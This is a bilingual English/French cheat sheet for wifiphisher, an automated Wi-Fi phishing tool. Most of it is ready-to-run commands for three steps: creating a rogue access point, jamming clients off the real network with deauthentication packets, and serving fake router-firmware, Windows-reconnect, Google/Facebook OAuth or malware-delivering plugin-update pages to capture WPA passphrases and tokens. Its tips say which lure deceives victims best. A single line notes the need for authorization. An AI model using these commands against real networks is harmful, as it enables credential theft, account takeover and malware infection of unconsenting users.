wifiphisher
Framework automatisé de phishing Wi-Fi. Crée des points d'accès rogues et des pages de phishing pour capturer des identifiants WPA, des identifiants via des portails captifs, ou exploiter le navigateur. Automated Wi-Fi phishing framework. Creates rogue access points and phishing pages to capture WPA credentials, credentials through captive portals, or browser exploits.
↗ https://github.com/wifiphisher/wifiphisherOverview
wifiphisher automates Wi-Fi phishing attacks. It creates a rogue AP that mimics a legitimate network, deauths clients from the real AP, and serves a convincing phishing page to capture WPA credentials or OAuth tokens. No cracking required — credentials are entered directly by the victim.
Requirements
# Two wireless adapters required:
# Adapter 1: for AP creation (AP mode support needed)
# Adapter 2: for deauthentication (monitor mode support needed)
Check adapter capabilities
iw list | grep "Supported interface modes" -A 10
Basic Usage
Auto-select target and phishing scenario
sudo wifiphisher
Target a specific network
sudo wifiphisher -aI wlan0 -jI wlan1 -e "TargetSSID" --handshake-capture capture.pcap
Use a specific phishing scenario
sudo wifiphisher -aI wlan0 -jI wlan1 -e "TargetSSID" -p wifi_connect
Specify channel
sudo wifiphisher -aI wlan0 -jI wlan1 -e "TargetSSID" -c 6
Phishing Scenarios
List available phishing pages
sudo wifiphisher --list-scenarios
firmware-upgrade — fake router firmware upgrade page (captures WPA passphrase)
sudo wifiphisher -e "HomeNetwork" -p firmware-upgrade
wifi_connect — fake Windows network reconnect prompt
sudo wifiphisher -e "HomeNetwork" -p wifi_connect
oauth-browser — fake Google/Facebook OAuth page
sudo wifiphisher -e "HomeNetwork" -p oauth-browser
plugin_update — fake browser plugin update (delivers malware)
sudo wifiphisher -e "HomeNetwork" -p plugin_update
template_manager — launch the scenario selection UI
sudo wifiphisher -e "HomeNetwork" -p template_manager
Interface Options
# -aI = AP interface (creates the rogue AP)
# -jI = Jammer interface (sends deauth packets)
Let wifiphisher auto-detect interfaces
sudo wifiphisher
Manual interface assignment
sudo wifiphisher -aI wlan0 -jI wlan1
If you only have one adapter:
sudo wifiphisher -nJ # no jamming (victim must disconnect manually)
Capturing Handshakes
Capture WPA handshake for offline verification
sudo wifiphisher -e "TargetSSID" --handshake-capture /tmp/capture.pcap
# The captured passphrase is saved to:
# /tmp/wifiphisher-handshake.pcap
Custom Phishing Pages
Custom scenarios go in:
/usr/lib/python3/dist-packages/wifiphisher/data/phishing-pages/
Create custom page:
mkdir /path/to/custom_scenario
→ Add: info.json, index.html, and optional POST handler
Tips
- The firmware-upgrade scenario is the most convincing for home router targets
- Success depends on the victim trusting the phishing page and entering their password
- Deauth packets kick clients off the real AP, forcing them to reconnect to your rogue AP
- Legal only with explicit authorization — Wi-Fi phishing is illegal without consent
Help / Man page
wifiphisher [options]
-aI INTERFACE AP creation interface
-jI INTERFACE Jammer/deauth interface
-e ESSID Target network SSID
-c CHANNEL Channel (1-14)
-p SCENARIO Phishing scenario name
-nJ No jamming (no deauth)
--list-scenarios List available scenarios
--handshake-capture FILE Capture WPA handshake to file
--payload-path FILE Custom payload for plugin_update scenario
-kN Kill NetworkManager
-qS Quiet mode (suppress deauth output)
Vue d’ensemble
wifiphisher automatise les attaques de phishing Wi-Fi. Il crée un AP rogue qui imite un réseau légitime, déauthentifie les clients de l’AP réel, et sert une page de phishing convaincante pour capturer des identifiants WPA ou des tokens OAuth. Aucun cracking requis : les identifiants sont saisis directement par la victime.
Prérequis
# Deux adaptateurs wireless requis :
# Adaptateur 1 : pour la création de l'AP (support du mode AP nécessaire)
# Adaptateur 2 : pour la déauthentification (support du mode monitor nécessaire)
# Vérifier les capacités de l'adaptateur
iw list | grep "Supported interface modes" -A 10
Utilisation de base
# Sélection automatique de la cible et du scénario de phishing
sudo wifiphisher
# Cibler un réseau spécifique
sudo wifiphisher -aI wlan0 -jI wlan1 -e "TargetSSID" --handshake-capture capture.pcap
# Utiliser un scénario de phishing spécifique
sudo wifiphisher -aI wlan0 -jI wlan1 -e "TargetSSID" -p wifi_connect
# Spécifier le canal
sudo wifiphisher -aI wlan0 -jI wlan1 -e "TargetSSID" -c 6
Scénarios de phishing
# Lister les pages de phishing disponibles
sudo wifiphisher --list-scenarios
# firmware-upgrade : fausse page de mise à jour du firmware du routeur
# (capture la phrase de passe WPA)
sudo wifiphisher -e "HomeNetwork" -p firmware-upgrade
# wifi_connect : fausse invite de reconnexion réseau Windows
sudo wifiphisher -e "HomeNetwork" -p wifi_connect
# oauth-browser : fausse page OAuth Google/Facebook
sudo wifiphisher -e "HomeNetwork" -p oauth-browser
# plugin_update : fausse mise à jour de plugin de navigateur (livre un malware)
sudo wifiphisher -e "HomeNetwork" -p plugin_update
# template_manager : lance l'interface de sélection de scénario
sudo wifiphisher -e "HomeNetwork" -p template_manager
Options d’interface
# -aI = interface AP (crée l'AP rogue)
# -jI = interface de brouillage (envoie les paquets de déauthentification)
# Laisser wifiphisher détecter automatiquement les interfaces
sudo wifiphisher
# Attribution manuelle des interfaces
sudo wifiphisher -aI wlan0 -jI wlan1
# Si vous n'avez qu'un seul adaptateur :
sudo wifiphisher -nJ # pas de brouillage (la victime doit se déconnecter manuellement)
Capture de handshakes
# Capturer le handshake WPA pour vérification hors ligne
sudo wifiphisher -e "TargetSSID" --handshake-capture /tmp/capture.pcap
# La phrase de passe capturée est sauvegardée dans :
# /tmp/wifiphisher-handshake.pcap
Pages de phishing personnalisées
# Les scénarios personnalisés vont dans :
/usr/lib/python3/dist-packages/wifiphisher/data/phishing-pages/
# Créer une page personnalisée :
mkdir /path/to/custom_scenario
Ajouter : info.json, index.html, et un gestionnaire POST optionnel
Conseils
- Le scénario firmware-upgrade est le plus convaincant pour les cibles de routeurs domestiques
- Le succès dépend de la confiance de la victime envers la page de phishing et de la saisie de son mot de passe
- Les paquets de déauthentification expulsent les clients de l’AP réel, les forçant à se reconnecter à votre AP rogue
- Légal uniquement avec une autorisation explicite : le phishing Wi-Fi est illégal sans consentement
Aide / Page de manuel
wifiphisher [options]
-aI INTERFACE AP creation interface
-jI INTERFACE Jammer/deauth interface
-e ESSID Target network SSID
-c CHANNEL Channel (1-14)
-p SCENARIO Phishing scenario name
-nJ No jamming (no deauth)
--list-scenarios List available scenarios
--handshake-capture FILE Capture WPA handshake to file
--payload-path FILE Custom payload for plugin_update scenario
-kN Kill NetworkManager
-qS Quiet mode (suppress deauth output)